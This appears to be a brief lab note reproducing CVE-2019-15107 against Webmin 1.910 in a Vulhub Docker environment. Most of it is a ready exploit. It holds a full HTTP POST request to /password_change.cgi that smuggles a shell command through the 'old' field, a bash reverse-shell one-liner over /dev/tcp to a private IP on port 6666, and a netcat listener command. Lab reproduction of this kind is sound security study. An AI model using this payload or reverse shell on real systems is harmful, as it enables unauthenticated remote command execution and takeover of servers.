https://vulhub.org/#/environments/webmin/CVE-2019-15107/


Webmin 1.910
cd ~/vulhub/webmin/CVE-2019-15107

环境启动:
sudo docker-compose up -d # 下载拉取环境
sudo docker ps -a # 查看下载拉取的文件
已启动:访问端口10000

访问https://192.168.225.166:10000/

POST /password_change.cgi
POST /password_change.cgi HTTP/1.1
Host: your-ip:10000
Accept-Encoding: gzip, deflate
Accept: */*
Accept-Language: en
User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Win64; x64; Trident/5.0)
Connection: close
Cookie: redirect=1; testing=1; sid=x; sessiontest=1
Referer: https://your-ip:10000/session_login.cgi
Content-Type: application/x-www-form-urlencoded
Content-Length: 60
user=rootxx&pam=&expired=2&old=test|id&new1=test2&new2=test2

bash -c "bash -i &> /dev/tcp/192.168.225.166/6666 0<&1"
nc -lvp 6666

